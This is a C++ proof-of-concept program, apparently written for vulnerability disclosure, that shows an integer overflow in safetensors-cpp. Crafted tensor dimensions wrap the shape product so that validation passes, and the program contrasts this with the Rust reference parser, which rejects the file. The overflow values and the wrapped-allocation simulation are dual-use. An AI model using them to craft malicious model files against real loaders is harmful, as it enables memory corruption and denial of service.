// rez0's picture
// Upload folder using huggingface_hub
// 4c19aea verified
/**
* test_overflow.cc - Demonstrates integer overflow vulnerability in safetensors-cpp
*
* This program loads a malicious .safetensors file where shape dimensions
* are crafted to overflow uint64 multiplication in get_shape_size().
*
* The file passes safetensors-cpp validation because:
* shape = [4194305, 4194305, 211106198978564]
* get_shape_size() = 4194305 * 4194305 * 211106198978564 (overflows to 4)
* tensor_size = 4 * sizeof(F32) = 16 bytes
* data_offsets = [0, 16] -> data_size = 16 bytes
* tensor_size == data_size -> VALIDATION PASSES
*
* But the declared shape claims ~3.7 * 10^27 elements.
*
* IMPACT: Any code that trusts the shape for buffer allocation or iteration
* will either:
* (a) Attempt a massive allocation (DoS / OOM)
* (b) If they also overflow, allocate a tiny buffer and write OOB (heap overflow)
* (c) Iterate over wrong number of elements, causing OOB reads
*
* Compile: g++ -std=c++17 -I safetensors-cpp -o test_overflow test_overflow.cc
*/
#include <cstdio>
#include <cstdint>
#include <cstdlib>
#include <cstring>
#include <fstream>
#include <vector>
#include <iostream>
#include <limits>
#include "safetensors.hh"
/**
 * Entry point for the integer-overflow proof of concept.
 *
 * Reads a .safetensors file ("overflow_tensor.safetensors" by default, or
 * argv[1] when given) into memory, parses it with
 * safetensors::load_from_memory(), runs safetensors::validate_data_offsets(),
 * and then prints, for every tensor, the declared shape next to the sizes the
 * library derives from it.
 *
 * The narrative strings ("F32", "~3.7e27", ...) describe the crafted PoC file
 * and are printed verbatim whichever file is loaded.
 *
 * @param argc  Argument count.
 * @param argv  Optional argv[1]: path of the file to inspect.
 * @return 0 when the file was read and parsed (whatever the validation
 *         verdict), 1 when it could not be opened, read, or parsed.
 */
int main(int argc, char *argv[]) {
  const char *filepath = "overflow_tensor.safetensors";
  if (argc > 1) {
    filepath = argv[1];
  }
  printf("=== safetensors-cpp Integer Overflow PoC ===\n\n");

  // Read file into memory. Opening with `ate` puts the cursor at the end so
  // tellg() reports the file size.
  std::ifstream ifs(filepath, std::ios::binary | std::ios::ate);
  if (!ifs.is_open()) {
    fprintf(stderr, "Failed to open %s\n", filepath);
    return 1;
  }
  // tellg() returns -1 on failure; converting that straight to size_t would
  // request an enormous buffer, so check the signed value first.
  const std::streamoff end_pos = ifs.tellg();
  if (end_pos < 0) {
    fprintf(stderr, "Failed to determine size of %s\n", filepath);
    return 1;
  }
  const size_t filesize = static_cast<size_t>(end_pos);
  ifs.seekg(0);
  std::vector<uint8_t> data(filesize);
  // A short or failed read must not be handed to the parser as if complete.
  if (!ifs.read(reinterpret_cast<char *>(data.data()),
                static_cast<std::streamsize>(filesize))) {
    fprintf(stderr, "Failed to read %s\n", filepath);
    return 1;
  }
  ifs.close();
  printf("[*] Loaded file: %s (%zu bytes)\n", filepath, filesize);

  // Parse with safetensors-cpp
  safetensors::safetensors_t st;
  std::string warn, err;
  const bool ok = safetensors::load_from_memory(data.data(), data.size(),
                                                filepath, &st, &warn, &err);
  if (!ok) {
    printf("[!] load_from_memory FAILED: %s\n", err.c_str());
    return 1;
  }
  if (!warn.empty()) {
    printf("[!] Warnings: %s\n", warn.c_str());
  }
  printf("[+] load_from_memory SUCCEEDED (file parsed without error)\n\n");

  // Validate data offsets (this is the check that should catch overflow)
  std::string val_err;
  const bool valid = safetensors::validate_data_offsets(st, val_err);
  printf("[*] validate_data_offsets: %s\n", valid ? "PASSED" : "FAILED");
  if (!valid) {
    printf(" Error: %s\n", val_err.c_str());
  }

  // Examine the tensor(s)
  for (size_t i = 0; i < st.tensors.size(); i++) {
    const std::string key = st.tensors.keys()[i];
    safetensors::tensor_t tensor;
    st.tensors.at(i, &tensor);
    printf("\n[*] Tensor: '%s'\n", key.c_str());
    // Hard-coded: the PoC file declares its tensor as F32.
    printf(" dtype: F32\n");
    printf(" shape: [");
    for (size_t j = 0; j < tensor.shape.size(); j++) {
      if (j > 0) printf(", ");
      printf("%zu", tensor.shape[j]);
    }
    printf("]\n");
    printf(" data_offsets: [%zu, %zu]\n", tensor.data_offsets[0], tensor.data_offsets[1]);

    // Show the overflow: these are the values the library itself computes.
    const size_t shape_size = safetensors::get_shape_size(tensor);
    const size_t dtype_bytes = safetensors::get_dtype_bytes(tensor.dtype);
    const size_t tensor_size = dtype_bytes * shape_size;
    const size_t data_size = tensor.data_offsets[1] - tensor.data_offsets[0];
    printf("\n [OVERFLOW ANALYSIS]\n");
    printf(" get_shape_size() = %zu (OVERFLOWED! True value: ~3.7e27)\n", shape_size);
    printf(" get_dtype_bytes() = %zu\n", dtype_bytes);
    printf(" tensor_size = %zu * %zu = %zu\n", dtype_bytes, shape_size, tensor_size);
    printf(" data_size = %zu\n", data_size);
    printf(" tensor_size == data_size? %s\n",
           tensor_size == data_size ? "YES (validation passes!)" : "NO");

    // Everything below indexes shape[0..2]; a tensor of lower rank would be an
    // out-of-bounds read, so skip the demonstration for it.
    if (tensor.shape.size() < 3) {
      printf("\n [IMPACT DEMONSTRATION] skipped: tensor has %zu dimension(s), need at least 3\n",
             tensor.shape.size());
      continue;
    }

    // Demonstrate the danger: a naive consumer trusting shape
    printf("\n [IMPACT DEMONSTRATION]\n");
    printf(" A consumer that trusts shape dimensions would compute:\n");
    printf(" shape[0] * shape[1] * shape[2] = ");
    // Compare the true product against UINT64_MAX using 128-bit arithmetic.
    // Three 64-bit factors can exceed even 128 bits, so the product is formed
    // in two steps and never multiplied past the point where the answer is
    // already known.
    const __uint128_t u64_max = static_cast<__uint128_t>(UINT64_MAX);
    const __uint128_t first_two =
        static_cast<__uint128_t>(tensor.shape[0]) * tensor.shape[1];
    bool exceeds_u64 = false;
    if (tensor.shape[2] == 0) {
      exceeds_u64 = false;  // the full product is exactly 0
    } else if (first_two > u64_max) {
      exceeds_u64 = true;   // already too large; a non-zero factor keeps it so
    } else {
      exceeds_u64 = first_two * tensor.shape[2] > u64_max;
    }
    printf("OVERFLOW (too large for uint64)\n");
    printf(" True product > UINT64_MAX: %s\n", exceeds_u64 ? "YES" : "NO");

    // Simulate what a consumer would do
    printf("\n [SIMULATED CONSUMER BEHAVIOR]\n");
    // Scenario 1: Consumer uses shape for allocation (overflows to small buffer).
    // The unsigned wrap-around here is intentional: it reproduces the bug.
    size_t alloc_size = 1;
    for (size_t j = 0; j < tensor.shape.size(); j++) {
      alloc_size *= tensor.shape[j];  // Same overflow!
    }
    alloc_size *= dtype_bytes;
    printf(" Consumer alloc (overflowed): %zu bytes (tiny!)\n", alloc_size);
    printf(" Consumer thinks tensor has: %zu * %zu * %zu = ~3.7e27 elements\n",
           tensor.shape[0], tensor.shape[1], tensor.shape[2]);
    // Describe (without performing) the mismatch between the wrapped
    // allocation size and an iteration driven by the declared shape.
    printf("\n If consumer allocates %zu bytes but iterates shape[0]*shape[1]*shape[2] times:\n", alloc_size);
    printf(" -> HEAP BUFFER OVERFLOW (writing ~3.7e27 * 4 bytes into %zu byte buffer)\n", alloc_size);
    printf(" This is a critical memory safety vulnerability.\n");
  }

  printf("\n=== DIFFERENTIAL RESULT ===\n");
  printf(" Rust (reference): REJECTS file with SafeTensorError::ValidationOverflow\n");
  printf(" C++ (safetensors-cpp): ACCEPTS file, validation passes\n");
  printf(" Impact: A model file that Rust deems invalid is accepted by C++\n");
  printf(" The shape values cause integer overflow, enabling heap corruption\n");
  return 0;
}